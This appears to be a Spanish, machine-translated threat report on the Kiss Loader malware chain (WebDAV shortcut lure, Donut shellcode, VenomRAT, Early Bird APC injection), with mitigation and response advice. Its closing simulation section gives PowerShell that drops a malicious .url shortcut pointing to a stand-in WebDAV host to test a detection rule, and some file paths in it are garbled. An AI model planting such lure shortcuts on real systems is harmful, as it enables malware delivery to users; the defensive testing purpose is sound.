Cuando el Malware Responde: Interacción en Tiempo Real con un Actor de Amenaza Durante el Análisis de Kiss Loader

Resumen

Investigación por Centro de Seguridad de G DATA examina un nuevo cargador identificado llamado Kiss Loader. El artículo examina un cargador identificado recientemente llamado Kiss Loader, distribuido a través de un acceso directo de Windows que apunta a un repositorio WebDAV expuesto a través de un túnel TryCloudflare. Una vez lanzado, el cargador descifra shellcode generado por Donut, recupera cargas útiles como VenomRAT y un componente Kryptik, y las ejecuta a través de la inyección APC de Early Bird en explorer.exe. Durante el análisis, el investigador experimentó interacción directa con el operador del malware a través de una ventana de Notepad, que confirmó el uso del método de inyección Early Bird. El caso destaca la rápida evolución de la herramienta y la necesidad de un fuerte confinamiento al manejar malware activo.

Investigación

Los investigadores detonaron el acceso directo inicial en un laboratorio controlado y rastrearon la cadena de ejecución a través de un script WSH, componente JScript, archivos por lotes y un cargador basado en Python. Confirmaron el uso de shellcode generado por Donut, extrajeron las cargas útiles incrustadas y documentaron el método de inyección final, que pone en cola un APC en un explorer.exe proceso suspendido. A lo largo de la sesión, el equipo capturó salida detallada en tiempo de ejecución y mensajes de desarrolladores dejados dentro del flujo de malware. Un corto intercambio en tiempo real con el operador confirmó aún más tanto la técnica como el estado de desarrollo activo del cargador.

Mitigación

Las organizaciones deberían restringir o inspeccionar el tráfico WebDAV entregado a través de plataformas de túnel público como TryCloudflare, deshabilitar la ejecución automática de archivos de .url y aplicar controles estrictos de ejecución a scripts y archivos por lotes en rutas de inicio accesibles por el usuario. Las defensas de endpoint deberían detectar el comportamiento de inyección APC de Early Bird y vigilar procesos suspendidos que reciben APC en espera. Las listas de aplicaciones permitidas también deberían mantenerse actualizadas para bloquear cargadores desconocidos de Python y shellcode basado en Donut.

Respuesta

Si se detecta actividad de Kiss Loader, aísle el endpoint de inmediato, termine cualquier explorer.exe proceso sospechoso iniciado en un estado suspendido, y capture memoria para revisión forense. Los investigadores deberían identificar y bloquear la infraestructura relacionada de WebDAV, escanear el host en busca de VenomRAT, Kryptik y cualquier carga útil adicional caída, y rotar credenciales potencialmente expuestas. Luego se deberían revisar los registros en busca de otros intentos de intrusión, y las reglas de detección deberían actualizarse con todos los indicadores observados recientemente.

Ejecución de Simulación

Requisito previo: se debe haber aprobado la Verificación Previa de Telemetría y Línea Base.

• Narrativa de Ataque y Comandos:
  Un atacante con acceso limitado a la estación de trabajo de la víctima quiere establecer un punto de apoyo para el movimiento lateral. Crean un acceso directo malicioso de Internet de Windows llamado DKM_DE000922.pdf.url que apunta a una parte compartida maliciosa de WebDAV (http://malicious.example.com/webdav/evil.pdf). Cuando un usuario hace doble clic en el acceso directo, el sistema intenta montar automáticamente el recurso de WebDAV, haciendo que la víctima descargue la carga útil sin ejecutar un binario tradicional. La creación de este acceso directo genera un evento de creación de archivo que coincide con la regla de detección.

  powershell
  # Ruta donde se dejará el acceso directo (por ejemplo, el escritorio del usuario)
  $maliciousPath = "$env:USERPROFILEDesktopDKM_DE000922.pdf.url"
  
  # Contenido del archivo .url malicioso apuntando a una parte de WebDAV
  $maliciousContent = @"

  [InternetShortcut] URL=http://malicious.example.com/webdav/evil.pdf IconFile=%SystemRoot%system32shell32.dll IconIndex=0 «@

  # Escribe el archivo: esta acción debería activar la regla de detección
  Set-Content -Path $maliciousPath -Value $maliciousContent -Encoding ASCII
  

• Script de Prueba de Regresión: El script a continuación reproduce exactamente los pasos necesarios para generar la telemetría que activa la detección.

  powershell
  # ---------------------------------------------------------
  # Prueba de Regresión: Activar regla Sigma para archivos .url de WebDAV
  # ---------------------------------------------------------
  
  # 1. Definir ubicación objetivo (escritorio para el usuario actual)
  $targetFile = "$env:USERPROFILEDesktopDKM_DE000922.pdf.url"
  
  # 2. Construir contenido del acceso directo malicioso
  $urlPayload = @"

  [InternetShortcut] URL=http://malicious.example.com/webdav/evil.pdf IconFile=%SystemRoot%system32shell32.dll IconIndex=0 «@

  # 3. Escribir el acceso directo (esto provocará un evento FileCreate)
  Set-Content -Path $targetFile -Value $urlPayload -Encoding ASCII
  
  Write-Host "Atajo malicioso .url creado en $targetFile"
  

• Comandos de Limpieza: Eliminar el acceso directo malicioso después de la verificación.

  powershell
  $maliciousPath = "$env:USERPROFILEDesktopDKM_DE000922.pdf.url"
  if (Test-Path $maliciousPath) {
      Remove-Item -Path $maliciousPath -Force
      Write-Host "Acceso directo malicioso limpiado."
  } else {
      Write-Host "No se encontró acceso directo malicioso; nada que limpiar."
  }